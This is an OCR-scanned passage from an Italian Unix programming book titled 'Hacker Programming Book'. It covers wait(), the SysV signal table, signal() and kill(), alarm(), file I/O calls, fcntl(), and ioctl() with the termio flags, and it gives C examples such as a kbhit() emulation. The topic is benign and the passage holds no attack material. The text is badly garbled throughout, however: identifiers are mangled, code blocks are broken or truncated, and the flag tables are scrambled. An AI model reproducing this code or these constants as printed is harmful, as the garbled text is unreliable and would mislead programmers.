II primo caso d'insuccesso e' dovuto al fatto che la fork cerca di creare un nuovo 
processo oltre il numero consentito dal sistema. 

Il secondo caso invece e' dovuto a un tentativo di creare un nuovo processo oltre il 
numero consentito per ogni utente. 

Vediamo ora un altra chiamata di sistema utilizzata con le funzioni appena viste. 
Nell'esempio precedente ho utilizzato una REM per indicare una o più' istruzioni destinate 
a far attendere il padre fino ali 
terminazione del figlio. 

Questa funzione e' di fatto quello che fa la wait(). 

Il padre che invoca la wait sospende l'esecuzione finche il processo figlio non termina. 
Vediamo la sintassi di wait. 



int wait(status) 
int 'status; 




La wait restituisce il PID del processo figlio. 

Lo status serve a segnalare la causa che ha provocato la terminazione del processo 
figlio. 

In pratica dalla wait e' possibile tornare per tre motivi. 

Il primo e' legato all'intercettazione di un segnale (vedremo l'argomento legato ai segnali 
più' avanti). 

Il secondo motivo per cui si potrebbe ottenere il ritorno dal processo figlio e' l'esecuzione di 
quest'ultimo in trace mode. 

L'ultimo motivo e' legato alla chiamata di una funzione exit() (anche questa la vedremo 
prossimamente). 

Per precisione bisogna anche specificare che un ulteriore causa della terminazione 
potrebbe essere prodotto da un core dump. 

Per eseguire la valutazione della status bisogna suddividere i due bytes in due parti da 8 
bit. 

Se il processo figlio termina di conseguenza ad una chiamata alla funzione exit() il byte 
basso (quello di destra) sarà' zero mentre quello alto riporta l'argomento passato alla 
exit() stessa. 

Se la causa della terminazione e' invece un segnale il byte più' alto (quello di sinistra) sarà' 

0 mentre i primi sette bit del byte basso indicheranno il numero del segnale. 

Se l'ottavo bit del byte basso e' a 1 significa che e' stato prodotto un core dump. 

Se non per alcuni casi particolari generalmente risulta essere inutile dupplicare un 

processo con la fork() e poi fare attendere il padre che il figlio termini la sua esecuzione. 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



In pratica e' più' conveniente progettare il software facendo in modo che il processo padre e 

quello figlio proseguano per la loro strada senza che uno debba attendere l'altro. 

Avvalendosi dei codici ritornati dalla fork() e' possibile indirizzare il programma. 

Ho detto prima che un processo potrebbe terminare a seguito di un invio di un segnale da 

parte del kernel o da parte di una altro processo. 

Sottono Xenix o sotto Unix SysV abbiamo 19 segnali con i seguenti scopi. 

SIGHUP 01 Hangup. 

Si verifica allo scollegamento di un terminale. 

SIGINT 02 Interrupt. 

Viene inviato tutte le volte che si verifica una richiesta d' interruzione da parte di un 
break. 

SIGQUIT 03 Quit. 

Viene richiamato al fine di ottenere un core dump a seguito di una richiesta di quit. 

SIGILL 04 lllegal instruction. 

Si verifica nel caso che venga identificata un istruzione illegale. 

SIGTRAP 05 Trace trap. 

Dopo aver attivato il trace viene inviato dopo ogni istruzione del processo. 

SIGIOT 06 I/O trap instructions. 

Si verifica a seguito di un difetto hardware. 

SIGEMT 07 Emulator trap instruction. 
Dipende dall'implementazione hardware. 

SIGFPE 08 Floating point exception. 

Usato per segnalare un errore su un floating-point. 

SIGKILL 09 Kill. 

Termina l'esecuzione di un processo. 

SIGBUS 10 Buserror. 

In genere indica un errore d'indirizzamento. 

SIGDEV 1 1 Segmentation violation. Può' essere chiamato ogni volta che il programma 
cerca di accedere a dati al di fuori del suo segmento. 

SIGSYS 12 Bad argument to system cali. 

SYGPIPE 13 Write on a pipe not opened for writing. 

Quando una pipe non possiede un lettore viene inviato questo segnale. 

SIGALARM 14 Alarm clock. 

Viene inviato quando scade il termine impostato dalla funzione alarm(). 

SIGTERM 15 Software termination. 
E' il segnale di terminazione standard. 

SIGUSR1 16 User defined signal 1. 
SIGUSR2 17 User defined signal 2. 

Ambedue rappresentano segnali utilizzati per la comunicazione tra processi. 

SIGCLD 18 Death of a child. 

Viene inviato al padre quando il figlio termina. 

SIGPWR 19 Power-failt restart. 
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Si verifica in seguito ad una caduta di tensione nel sistema. 



I segnali SIGQUIT, SIGILL, SIGTRAP, SIGIOT, SIGEMT, SIGFPE, SIGBUS, SIGSEGV 
e SIGSYS creano nella directory corrente un immagine core. 

La funzione 

^include <signal . h> 

int (*s±gnal (sig, fune) ) () 



permette di intercettare uno dei segnali descritti nelle pagine precedenti e di stabilire il 
"comportamento" del programma. 

Infatti grazie ai flags specificati nella signal() e' possibile far eseguire diverse funzioni al 
processo. 

Il modo di default ovvero quello ottenuto settando il flag SIG_DFL provoca la 
terminazione del programma. 

E' possibile anche, ad esempio specificando il flag SIGJGN, far ignorare il segnale (non e' 
possibile per tutti i segnali). 
Ad esempio : 

signal(SIGINT,SIG_IGN); 

farà' ignorare al processo il segnale di break. 
La SIGKILL non e' possibile ignorarla. 

Il secondo argomento della signal() può' essere un puntatore ad una funzione che deve 
essere eseguita nel caso che il segnale, specificato come primo argomento, venga inviato al 
processo. 

Un attenta gestione dei segnali può' eliminare il pericolo di seri inconvenienti che 
potrebbero verificarsi a causa della terminazione improvvisa del processo a causa di un 
segnale. 

La funzione signal() restituisce il valore reso dalla funzione passata come argomento alla 
sua chiamata. 

Come dicevo prima molti segnali potrebbero essere inviati dal kernel. 

In ogni caso mediante la funzione kill() e' possibile inviare segnali da un processo ad un 

altro. 

Prendiamo un semplicissimo esempio. 

Supponiamo di creare con la fork() un processo figlio che debba svolgere qualche compito. 
Neil' esempio verrà' eseguita solo la stampa e poi il processo si metterà' in attesa del 
segnale. 

Successivamente immaginiamoci che questo debba essere interrotto dall'invio di un segnale 
da parte del processo padre. 

^include <signal . h> 

p_terminate ( ) 
{ 

printf("\nHo ricevuto SIGINT."); 
printf ( " \nTermino \n ") ; 
exit (1) ; 

} 

new_funct () 
{ 

signal ( SIGINT, p_ t ermi nate) ; 

printf ("\n\nSono il processo figlio. (PID = %d).", 
getpidO) ; 

printf ("\nHo 2 secondi di tempo per stampare queste stringhe."); 
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printf ("\nTra poco mio padre mi inviera' un segnale 
d'interruzione. ") ; 

printf ("\nLo attendo \n") ; 

for(;;); /* Loop attendendo la signal */ 

ì 

main ( ) 
{ 

int new _process; 
if(!(new _process = fork())) 
new_funct () ; 

else { 

printf ("\nQuesto e' il processo padre. \n") ; 
sleep (2) ; 

kill (new_process, SIGINT) ; 
sleep (2) ; 

} 

printf ("\nOra ci sono solo io. Il padre (PID = %d) . \n\n", 
jetpid ( 



La funzione sleep non e' mai stata vista prima. 
Il suo scopo e' semplicissimo. 

In pratica sospende il processo per il numero di secondi specificato come argomento. 
La sintassi esatta e' : 



unsigned sleep(seconds) 
unsigned seconds; 

Nell'esempio precedente ho usato un ciclo for(;;) per fare in modo che il processo figlio 
entrasse in un loop infinito in attesa di un segnale. 

Nelle librerie dello Xenix esiste una funzione apposita che permette di fare la stessa cosa. 
In pratica si tratta della funzione : 



int pause(); 

Il segnale che la pause() deve attendere non può' essere uno di quelli con cui si e' 
utilizzata la signal() per farlo ignorare (con il flag SIGJGN). 

Prima di proseguire con altre funzioni legate ad altri scopi vediamone ancora una legata ai 
segnali. 

Si tratta della funzione 



unsigned alarm(sec) 
unsigned sec; 

Questa setta un determinato tempo espresso in secondi trascorsi i quali viene inviato un 
segnale SIGALRM al processo stesso. 

Per portare un esempio di utilizzo vediamo una routine d'esempio scritta per Ms Dos e 
successivamente la stessa cosa per ambiente Unix. 

Supponiamo di dover scrivere una piccola procedura che serva a ricevere un carattere 
controllando il tempo massimo di attesa. 

In altre parole la routine dovrà' eseguire il test di ricezione per 2 secondi massimi e se entro 
quel tempo non e' stato ricevuto nulla dovrà' segnalare un errore di timeout. 

La codifica per ambiente Ms Dos potrebbe essere : 

/* 

** set_max_time () 
** 

** Calcola la differenza tempo dalla chiamata alla funzione 
** aggiungendo il tempo passato come argomento. 
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long set_max_time (int seconds) 
{ 

long retvalue; 

_blos_timeofday (_TIME_GETCLOCK, Sretvalue) ; 
retvalue+= seconds * 18; 
return (retvalue) ; 

ì 

/* 

** istimeup () 
** 

** Ritorna 1 se il tempo corrente e ' >= a quello passato come 

** argomento. 

*/ 

int istimeup (long timepas) 

{ 

long retvalue; 

_bios_timeofday (_TIME_GETCLOCK, Sretvalue) ; 
return ( (retvalue > timepas) 7 1:0) ; 

) 

/* 

** com_getc() 
** 

** Riceve un carattere dalla seriale controllando il timeout 
*/ 

unsigned com_getc (char timeout) 
{ 

long ti; 

int carattere; 

ti = s e t_max_t ime (timeout) ; 

while(l) { 

if ( (carattere = rx_char()) != -1) 

return (carattere) ; 
if (istimeup (ti) ) 
return (-1) ; 




La funzione rx_char() non e' stata riportata ma in ogni caso ritorna -1 nel caso che non ci 
sia nessun carattere sulla porta oppure, in caso contrario, il codice del carattere ricevuto. 
La funzione set_max_time() calcola solo il numero di secondi dato dal tempo attuale + il 
numero di secondi passato come argomento. 

La funzione istimeup() invece controlla che il tempo non sia trascorso. 

Vediamo mediante alarm() come e' possibile riscrivere la stessa procedura sotto sistema 

operativo Unix. 

^include <signal . h> 

int flag; 

endf() 
{ 

flag = 1; 

} 

com_getc (timeout) 
int timeout; 
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flag = 0; 

slgnal ( SIGALRM, endf) ; 
alanti (timeout) ; 
while(l) { 

if ( (carattere = rx_char()) 

return (carattere) ; 
if(flag) 

return (-1) ; 



== -1) 



In pratica la signal specifica che se viene inviato un segnale d'allarme deve essere 

eseguita la funzione endf() la quale setterà il flag che indica il timeout. 

In un precedente esempio avevo utilizzato alcune funzioni di cui e' solo stato accennato lo 

scopo. 

In pratica si tratta di : 



int getuidf) ; /* ritorna la real-user-ID */ 

int getgid() ; /* ritorna la real-group-ID*/ 

int geteuid() ; /* ritorna la effective-user-ID 

int getegid() ; /* ritorna la effective-user-ID 

int getpid() ; /* ritorna il process-ID */ 

ìt getpgrpO; /* ritorna il process-group-ID 



*/ 
*/ 



I valori restituiti dalle funzioni appena elencate sono stati descritti nelle pagine relative alla 
teoria sui processi. 

Sempre in quella parte del testo avevamo parlato della possibilità' di cambiare, da 
parte di un processo, il process-group-ID. 
La funzione 



serve appunto allo scopo. 

Una parte fondamentale della programmazione e' legata all'utilizzo dei files su disco, 
siano questi files normali, directory o files speciali. 

Le funzioni che vedremo ora non sono dedicate al solo I/O su file anche se in questa parte 

del fascicolo le vedremo solo da questo punto di vista. 

Le funzioni principali legate all' uso di files sono le seguenti: 

#include <fcntl.h> 

int open(path,oflag[,mode]) 

char *path; 



La funzione open apre un file per la lettura, per la scrittura o per ambedue le operazioni 
(specificato da oflag). 

Le costanti definite in fcntl.h permettono i seguenti scopi : 

0_RDONLY II file e' aperto per la sola lettura. 
0_WRONLY II file e' aperto per la sola scrittura. 
0_RDWR II file e' aperto sia in scrittura che in lettura. 

0_APPEND II puntatore al file viene posizionato alla fine dello stesso 
prima di iniziare la scrittura. 

0_CREATSe il file esiste il flag non ha nessun effetto. In caso contrario il 
file viene creato. 

0_TRUNCSe iol file esiste ne tronca la lunghezza a zero. 

0_EXCL Se specificato il 0_CREAT la open fallisce nel caso che il file 
esista già ' . 

0_WSYNCCon 0_WSYNC specificato la write ritornerebbe solo a completamento 
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Vediamo subito l'ultimo flag, l'unico per cui penso che ci sia da dire alcune cose. 

In pratica dopo l'apertura di un file e' possibile eseguire delle operazioni di lettura mediante 

read() o di scrittura mediante write() in funzione ai flags specificati nella stessa funzione 

open(). 

Un write indirizzata a un determinato file non scriverebbe di fatto direttamente su questo 
ma bensì in un buffer del sistema il quale si interesserebbe ad eseguire successivamente la 
scrittura fisica sul disco. 

Questo significa che nell'istante in cui si verifica il ritorno dalla funzione di scrittura write() i 
dati non sono ancora effettivamente sul file su disco anche se di fatto la funzione ci ha 
segnalato che tutto e' andato per il verso giusto. 

Si potrebbe verificare che immediatamente dopo al ritorno dalla funzione di scrittura 
avvenga qualche incidente che impedisca al sistema di eseguire il trasferimento dei buffers 
sui files. 

In questo caso noi saremmo convinti che i dati risiedano al loro posto quando in effetti questo 
non e' assolutamente vero. 

Specificando 0_WSYNC un eventuale operazione di scrittura aspetterebbe prima di 
ritornare che sia avvenuto il trasferimento dal buffer al file fisico dandoci in questo modo la 
sicurezza che i dati risiedano in effetti in quest' ultimo. 

Normalmente questo flag ritarda notevolmente l'esecuzione del programma e quindi e' 
consigliabile utilizzarlo solo nei casi in cui si voglia la certezza matematica dell'avvenuta 
scrittura. 

Gli scopi dei rimanenti flags elencati precedentemente sono deducibili dalla breve 
descrizione riportata a fianco degli stessi. 

La specifica 'mode' e' quella relativa ai permessi legati al file al file da aprire. 
Abbiamo visto che nella funzione open esiste un flag 0_CREAT. 
Tra le chiamate di sistema di Unix esiste la funzione 'creat()'. 
La descrizione di questa e' la seguente : 

int creat(path_name,mode) 

char *path_name; 
int mode; 



La funzione crea un nuovo files o reinizializza uno già' esistente. 
La rinizializzazione del file ne tronca il contenuto a 0. 

La chiamata alla funzione restituisce un intero positivo che identifica il descrittore del file 
creato oppure -1 per indicare un errore. 

Le funzioni che vedremo ora sono quelle fondamentali per tutte le funzioni di I/O con files, 
files speciali o device. 

int write(fd, buffer, num_byte) 

int fd; 

char *buffer; 
unsigned num_byte; 

Write scrive num_byte puntati da buffer sul descrittore di file (fd) restituito da una chiamata 
ad open, creat, dup, fcntl o pipe (queste ultime tre le vedremo più' avanti). 
La funzione ritorna il numero di bytes effettivamente letti o -1 in caso d'errore. 
La read() ha un funzionamento analogo 

int read(fd, buffer, num_byte) 

int fd; 

char *buffer; 
unsigned num_byte; 

In pratica vengono letti num_byte dal descrittore fd e salvati nella memoria puntata da 
buffer. 
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Come per la read() vengono restituiti il numero di byte letti, 0 in caso di fine file e -1 in caso 
d'errore. 

Esiste un altra condizione per cui la funzione read() potrebbe restituire il valore 0. 

Le tre funzioni di I/O appena viste sono valide anche per quando riguarda l'accesso ai 

terminali. 

Sotto sistema operativo Unix un file viene visto come una semplicissima sequenza di 
bytes. 

Quando utilizziamo una funzione write per la prima volta dopo aver aperto il file potremo 
decidere dove eseguirla scegliendo tra due soluzioni. 

Se e' stato specificato il flag 0_APPEND allora la scrittura avverrà alla fine del file mentre 
nel caso contrario avverrà dall'inizio. 

La read() la prima volta dovrà' necessariamente leggere dal punto iniziale. 

Al fine di permettere un posizionamento sui files lo Unix mette a disposizione una chiamata e 

precisamente 

long lseek(fd, spiazzamento, base) 
int fd; 

long spiazzamento; 



Come al solito fd rappresenta il descrittore del file. 

Spiazzamento e' l'offset a partire da quella definita come base che può' assumere i seguenti 
valori: 

0 - A partire dall'inizio file 

1 - A partire dalla posizione corrente 



Ad esempio 



struct cliente { 

char nome [20] ; 
char ind[20] ; 



} eli, *cl; 

int read_record (fd, num, eli) 
int fd; 
long num; 

struct cliente *cli; 
{ 

long offset; 

offset = (num -1) * sizeof (struct clienti) ; 
if (lseek(fd, offset, 0) == -1) 
return (-1) ; 

return (read(fd, (char *) eli, sizeof (struct clienti))); 

) 

main ( ) 
i 

int fd, err; 

long n_cliente = 1; 

ci = Scll; 

fd = open ( "clienti, dat ", 0_RDONLY) ; 
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if ( (err = read_record(fd, n_ 


cliente++, ci) ) > 0) { 


printf ("\n\nNome : %i 


3", cl->nome) ; 


printf( " \nIndirlzzo 


: %s", cl->ind) ; 




} else 




if(err == -1) { 




perror ( "Read") ; 




exit (-1) ; 




} else 




break; 




} 




ì 





Il path_name specificato come argomento nella funzione open() potrebbe essere il nome di 
un particolare device corrispondente a un terminale. 
Ad esempio : 



Come avrete certamente notato nell'esempio precedente esiste un flag di cui non e' mai 

stato detto niente. 

Si tratta di 0_NDELAY. 

Normalmente la funzione read(), avendo a che fare con terminali, nel caso che non ci 
siano dati disponibili, si blocca e li attende interrompendo in questo modo il processo che 
ne ha fatto uso.. 

Se il flag 0_NDELAY viene specificato tra gli argomenti della open allora la read ritornerà 
immediatamente nel caso che non ci siano caratteri da leggere, restituendo il valore 0. 
Come avevamo detto prima anche il fine file (in questo caso digitato dall'utente) 
restituisce 0. 

Nella fase di sviluppo di un programma bisogna, nel caso di letture senza attesa (con 
0_NDELAY specificato), ricordarsene e sostiture il carattere di fine file (EOT) con un altro. 
La specifica dei flags al momento della open() permette di conferire al file aperto 
determinate proprietà. 

Esiste una chiamata di sistema che permette di modificare queste ultime quando il file e' già' 
aperto. 

Si tratta della funzione 



int fcntl(fd,funz, argomenti) 




In pratica fd e' il descrittore del file, funz il servizio richiesto (vedi la prossima tabella) e 
argomento i flags 0_APPEND e/o 0_NDELAY. 
Vediamo il significato dei vari comandi disponibili. 

F_DUPFD - Ritorna un nuovo descrittore di file duplicato di quello che viene passato 
come argomento. 

F_GETFD -Ritorna il flag di chiusura file nel caso in cui venga chiamata la funzione 
exec(). 

Se il bit più' basso e' 0 allora il file rimarra' aperto durante una chiamata alla funzione 
exec() 

altrimenti verrà' chiuso. 

F_SETFD - Assegna il flag di chiusura file in caso di execQ. 
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F_GETFL - Ritorna i flag di stato del file associato a fd. 
F SETFL - Setta i flag di stato. 

Il seguente esempio potrebbe essere implementato in un programma per mettere la lettura in 
modo bloccante e viceversa. 

La funzione dovrà' essere richiamata passandogli il descrittore del file e il valore 1 nel caso 
che si voglia settare 0_NDELAY ad on oppure 0 nel caso contrario. 

int set_flags(fd,set) 

int fd, set; 

{ 

static int s_block, o_block; 
int flags; 

if((flags = fcntl (fd, F_GETFL, 0) ) == -1) 

return (-1) ; 
s_block = flags j 0_NDELAY; 
o_block = flags S ~0_NDELAY; 

return (fcntl (fd,F_SETFL, ((set) ?s_block : o_block) ) ) ; 



Ricordo che STDIN, STDOUT e STDERR sono descrittori di file validi per l'utilizzo con la 
funzione fcntl() in quanto anche se non hanno subito nessuna operazione di open() sono 
lasciati in eredita al processo corrente. 

Per portare un esempio di utilizzo della fcntl() con questi ultimi potremmo scrivere una 
funzione che simuli il comportamento della funzione kbhit() sotto sistema operativo MsDos. 
In pratica con il compilatore Microsoft C e' possibile creare dei costrutti del tipo 

while(!kbhit () ) 

puts("Non e' stato premuto nessun tasto"); 
var = getche () ; 

printf ("\nE' stata battuta la lettera %c" , var) ; 

La funzione kbhit() restituisce 0 nel caso che non sia stato battuto nessun tasto oppure > 0 
in caso contrario. 

All'interno del listato esiste una chiamata di sistema di cui non abbiamo ancora detto nulla. 
Per ora e' sufficente sapere sapere che questa setta alcune caratteristiche del terminale. 

^include < fcntl . h> 

^include <sys/types .h> 

^include <sys/ioctl . h> 

^include <termio. h> 

static char buff = 0; 

static struct termio terni; 

void setr() 
{ 

static struct termio n; 
ioctl (0, TCGETA, &n) ; 
term = n; 

n.c_lflag &= ~ICANON; 
n.c_cc[4] = 0; 
n.c_cc[5] = 1; 
ioctl (0, TCSETAF, &n) ; 
) 

void reset () 
{ 
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int blocca (fd, set) 

int fd, set; 

{ 

static int s_block, o_block; 
int flags; 

if((flags = fcntl (fd, F_GETFL, 0) ) == -1) 
return (-1) ; 

s_block = flags j 0_NDELAY; 
o_block = flags & ~0_NDELAY; 

return (fcntl (fd,F_SETFL, ((set) ? s_block : ojblock) ) ) ; 

) 

int kbhit () 

{ 

char c; 
if(buff) 
return (1) ; 

blocca (0, 0) ; 

if((c = read(0, &buff, 1) ) == -1) 
return (-1) ; 
else 

if(c) return (1) ; 
return (0) ; 



int getch() 
{ 

char car, r; 

if(buff) { 
car = buff; 
buff = 0; 

return (car S 0377); 
} 

blocca (0,1); 

if((r = read(0, &car,l)) == -1 II Ir) 
return (-1) ; 
else 

if(r) return (car & 0377); 



main ( ) 
{ 

char n; 
setr () ; 

while(! kbhit () ) 
printf ("\nNon ho ricevuto nulla"); 
n = getch() ; 

printf ("\nHo ricevuto %c\n\n", n) ; 
reset () ; 

} 

Quando si desidera sapere se e' stato battuto un carattere si invoca la kbhit(). 
Questa, chiamando setr(), setta il terminale legato a STDIN in modo che la successiva 
read() restituisca 0 nel caso che non ci sia nessun carattere disponibile invece di bloccarsi in 
attesa di questo. 

Se la read trova un carattere in attesa lo leggera' e le metterà' nella variabile buff in attesa di 
una chiamata a getch(). 
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Dopo aver testato la presenza di un carattere in input con kbhit() e' possibile richiamare 
la funzione di lettura. 

Questa testerà' se nella variabile temporanea e' presente qualche valore (buff > 0). 

In caso affermativo rinizializza la variabile buff con 0 e ritorna il carattere letto. 

Se la funzione getch() viene chiamata prima che un carattere venga battuto allora attiverà' 

la funzione di read e attenderà' l'arrivo del carattere. 

Come avrete notato nella funzione getch() viene richiamata la funzione blocca() per 
resettare il terminale in modo di lettura con bloccaggio. 

Fino a questo punto abbiamo accennato al fatto che le funzioni open(), read() e write() 
funzionano anche su device. 

Chiaramente lseek() se si tratta di un terminale non ha nessuno scopo. 

Nell'esempio precedente si e' vista una funzione che utilizzava la chiamata di sistema ioctl(). 

La ioctl() possiede due forme diverse di chiamata. 

La prima e' la seguente 

int ioctl (fd, comando, p_str_t e rm) 

int fd; 
int comando; 



mentre la seconda 

int ioctl (fd, comando, arg) 

int fd, comando, arg; 

Vediamo la descrizione della prima forma di ioctl(). 

I comandi disponibili per la chiamata ioctl() sono i seguenti. 

TCGETA - Riempie la struttura fermio con i dati del terminale 

TCSETA -Dopo aver inizializzato la struttura termio pone il terminale in accordo con 
queste. 

TCSETAW - Come TCSETA ma attende che tutto l'output precedente alla chiamata di 
settaggio venga smaltito. 

TCSETAF -Setta il terminale ma prima viene svuotata la coda d'input (i caratteri presenti 
vengono persi). 

La seconda forma di ioctl() utilizza come argomento un intero che indica l'effetto del 
comando. 

Sono accettati i seguenti comandi. 

TCSBRK - Attende che la coda di output sia inviata. Se l'argomento vale 0 allora viene 
inviato un break. 

TCSXONC - Con argomento uguale a 0 sospende l'output mentre con valore 1 lo riprende. 

TCSFLSH - Influisce sul flush delle code d' I/O. Se argomento vale 0 svuota la coda d'input, 
se vale 1 

svuota quella d'output mentre se vale 2 le svuota entrambe. 

L'argomento passato alla prima forma di ioctl() corrisponde a una struttura contenete i dati 
del terminale. 

Nel file d' include /usr/include/sys/termio.h viene definita la seguente struttura 

struct termio { 

unsigned short c_if lag; /* input modes 7 
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unsigned short c_oflag; /* output modes 7 
unsigned short c_cflag; /* control modes 7 
unsigned short cjflag; /* line discipline modes 7 
char cjine; /* line discipline 7 
unsigned char c_cc[NCC]; /* control chars 7 



Ci sono circa 50 flags che settano "comportamento" del terminale. 

Vedremo nella parte legata ai device driver il funzionamento più a basso livello del controllo di 

questi. 

Ogni gruppo di flags influisce sui modi di comportamento del device. 
Vediamo i flags che influenzano l'interpretazione dell'input definiti in 
/usr/include/sys/termio.h 



/* input modes */ 



tfdefine 


IGNBRK 


0000001 


#define 


BRKINT 


0000002 


#define 


IGNPAR 


0000004 


#define 


PARMRK 


0000010 


#define 


INPCK 


0000020 


#define 


ISTRIP 


0000040 


#define 


INLCR 


0000100 


#define 


IGNCR 


0000200 


#define 


ICRNL 


0000400 


#define 


IUCLC 


0001000 


#define 


IXON 


0002000 


#define 


IXANY 


0004000 


Mdefine 


IXOFF 


0010000 



Ignora il break in input */ 
Invia un segnale INTR al break 
Ignora errori di parità ' */ 
Traccia gli errori di parità ' 
Abilita in input il test di parità ' 
Tronca i caratteri in input a 7 bit 
Mappa i NL in CR in input */ 
Ignora i CR in input*/ 
Mappa i CR in NL in input */ 
Mappa i maiuscoli in minuscoli 
/* Abilita il controllo di flusso 
/* Abilita ogni carattere per XON 
/* Abilita invio XON/XOFF a coda piena 



/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 



*/ 

*/ 
V 
*/ 



*/ 

*/ 

V 
* , 



Penso che le brevi descrizioni siano sufficenti per comprendere il risultato ottenuto 
specificando il flag (flags | COSTANTE) oppure azzerandolo (flags & -COSTANTE). 
Vediamo ora, seguendo l'ordine dei campi della struttura termio, i flags che agiscono 
sull'output. 



/* output modes */ 



#define 


OPOST 


0000001 


/* 


Atti /disattiva elaborazione output 


*/ 


#define 


OLCUC 


0000002 


/* 


Mappa in minuscoli in maiuscoli 


*/ 


#define 


ONLCR 


0000004 


/* 


Mappa NL nella sequenza < 


CR-NL 


*/ 


#define 


OCRNL 


0000010 


/* 


Mappa CR in 


NL */ 






#define 


ONOCR 


0000020 


/* 


Non considera i CR alla i 


colonna 0 


*/ 


ftdefine 


ONLRET 


0000040 


/* 


Agisce su NL nei terminali */ 




#define 


OFILL 


0000100 


/* 


Usa caratteri di fili per ritardo 


*/ 


#define 


OFDEL 


0000200 


/* 


I caratteri 


di fili sono 


DEL (o NUL) 


*/ 


#define 


NLO 


0 


/* 


Selezionano 


lo stile dei 


ritardi 


*/ 


tfdefine 


NL1 


0000400 


/* 


per il line 


feed */ 






#define 


CRO 


0 


/* 


Selezionano 


lo stile dei 


ritardi 


*/ 


#define 


CRI 


0001000 


/* 


per i CR 


*/ 






#define 


CR2 


0002000 


/* 


*/ 








#define 


CR3 


0003000 


/* 


*/ 








#define 


TABO 


0 


/* 


Selezionano 


lo stile dei 


ritardi 


*/ 


#define 


TABI 


0004000 


/* 


per i tabs 


*/ 






#define 


TAB2 


0010000 


/* 


*/ 








#define 


TAB3 


0014000 


/* 


*/ 








#define 


BSO 


0 


/* 


Selezionano 


lo stile dei 


ritardi 


*/ 


#define 


BS1 


0020000 


/* 


per i backspace */ 






#define 


VTO 


0 


/* 


Selezionano 


lo stile dei 


ritardi 


*/ 


#define 


VT1 


0040000 


/* 


per i vertical tabs */ 






#define 


FFO 


0 


/* 


Selezionano 


lo stile dei 


ritardi 


*/ 
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Guardando le precedenti definizioni ci si potrebbe chiedere a che cosa servono i ritardi. 
In pratica servono per quei terminali che possono richiedere del tempo per svolgere le 
funzioni di CR, TAB ecc. 

Personalmente non mi e' mai capitato di doverli modificare. 

I flags attivabili (o disattivabili) per i controllo del terminale sono 



/* control modes */ 





CBAUD 


000001 7 




i~ ann 7 7 

mCUUCIììW -»- -l. 


band T"ai~& & / 




BO 


o 




0 band? 






B50 


0000001 

\J V \J \J \J \J Jm 




50 bauds 

\J JLy Q L* w 






B75 


0000002 

\j \j \j \j \y \j ^ 




75 bauds 


*/ 




B110 


0000003 

\J \J W W W \J J 




7 7 fl bauds 


/ 


$cIg fi n © 


B134 


0000004 

W W V V V \s ^ 




134 bauds 






B150 


0000005 




150 bauds 






B200 


0000006 

V V V V V W w 




200 bauds 


*/ 




B300 


0000007 

V W W V V V i 




300 bauds 


*/ 




B600 


0000010 




600 bauds 


*/ 




B1200 


0000011 

\J \J \J \J \J J. J. 




1200 bauds 


*/ 


Md&£ _in^ 


B1800 


0000012 

\J \J \J \J \J J. b 




1800 bauds 


*/ 


ff — *- .1 ^ V— 


B2400 


0000013 




2400 bauds 


*/ 




B4800 


0000014 




4800 bauds 


*/ 


ffuci .L 11 c? 


B9600 


0000015 

\J \J \J \J \J A- *J 




9600 bauds 


*/ 




EXTA 


0000016 

W W V V V -t w 




19200 bauds 


• */ 


#define 


B19200 


0000016 


/* 


*/ 




tfdefine 


EXTB 


0000017 


/* 


38400 bauds 


• */ 


#define 


B38400 


0000017 


/* 


*/ 




#define 


CSIZE 


0000060 


/* 


Settario la 


dimensione del carattere 


#define 


CS5 


0 


/* 


5 blts 


*/ 


#define 


CS6 


0000020 


/* 


6 blts 


*/ 


#define 


CS7 


0000040 


/* 


7 bits 


*/ 


#define 


CS8 


0000060 


/* 


8 bits 


*/ 


#define 


CSTOPB 


0000100 


/* 


Setta i bits di stop (1/2) */ 


#define 


CREAD 


0000200 


/* 


Abilita il 


ricevitore */ 


#define 


PARENB 


0000400 


/* 


Abilita controllo di parità ' */ 


#define 


PARODD 


0001000 


/* 


Abilita parità ' odd (even) */ 


#define 


HUPCL 


0002000 


/* 


Abilita hangup */ 


#define 


CLOCAL 


0004000 


/* 


Prende una 


linea senza controllo 


#define 


LOBLK 


0010000 


/* 


*/ 




#define 


CTSFLOW 


0020000 


/* 


Controllo di flusso mediante CTS 



*/ 



Allo stesso modo delle costanti precedente descriviamo i flags che definiscono la disciplina. 



/* line discipline 0 modes */ 



#define 
#define 
#define 
#define 
#define 
#define 
#define 



ISIG 

ICANON 

XCASE 

ECHO 

ECHOE 

ECHOK 

ECHONL 



0000001 
0000002 
0000004 
0000010 
0000020 
0000040 
0000100 



/* 
/* 
/* 
/* 



Abilita ricerca INTR e QUIT */ 
Abilita input canonico */ 
Canonica per maiuscole minuscole 
Rispedisce ogni carattere */ 
/* Echo "\b \b" al posto di ERASE 
/* Echo NL dopo carattere KILL*/ 
/* Echo NL */ 



*/ 
*/ 



Nelle descrizioni delle varie costanti ho spesso indicato "Abilita ". 

Come abbiamo già' detto settando il flags otteniamo un abilitazione e mettendolo a 0 lo 

disabilitiamo. 

Supponiamo che si voglia disattivare I' ECHO. 
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struct termio tbuf; 



main ( ) 
{ 

if(ioctl (0, TCGETA, Stbuf) 
perror("Ioctl"); 
rit (-11 



A questo punto i dati del terminale sono salvati nella struttura tbuf e quindi facendo 



e successivamente risettando i dati della struttura (ora modificati) con 

±f(ioctl(0,TCSETA,&tbuf) { 
perror("Ioctl ") ; 




si ottera' che l'input da tastiera non eseguirà più l'echo sul terminale. 
Generalmente l'input viene costituito in linee fino al carattere new line o EOT. 
Quando si vuole eseguire una lettura carattere dopo carattere bisogna azzerare il flag 
canonico con 



tbuf.cjflag &= -ICANON; 

Osservando la struttura termio riportata precedentemente avrete notato che esiste tra i 
campi un array di caratteri. 

In questo vengono in genere conservati i caratteri legati all' ERASE, KILL, ecc. 
Guardate la tabella 



c_cc[0] = Interrupt di de fault DEL 

c_cc[l] = Quit di de fault CTRL \ 
c_cc[2] = Erase di de fault # 
c_cc[3] = Kill di de fault @ 
c_cc[4] = EOT di de fault CTRL D 
c_cc[5] = EOL di de fault NUL 



Azzerando il flag canonico c_cc[4] e c_cc[5] non vengono utilizzati per quello che 
normalmente dovrebbero servire. 

Il loro contenuto viene settato con i due parametri MIN e TIME. 

In pratica MIN dice che i caratteri devono essere disponibili nell'istante in cui la coda si 
riduce al numero di caratteri specificato dal suo valore. 

La variabile TIME stabilisce invece il numero di decimi di secondo dopo di cui i caratteri 
devono essere disponibili. 

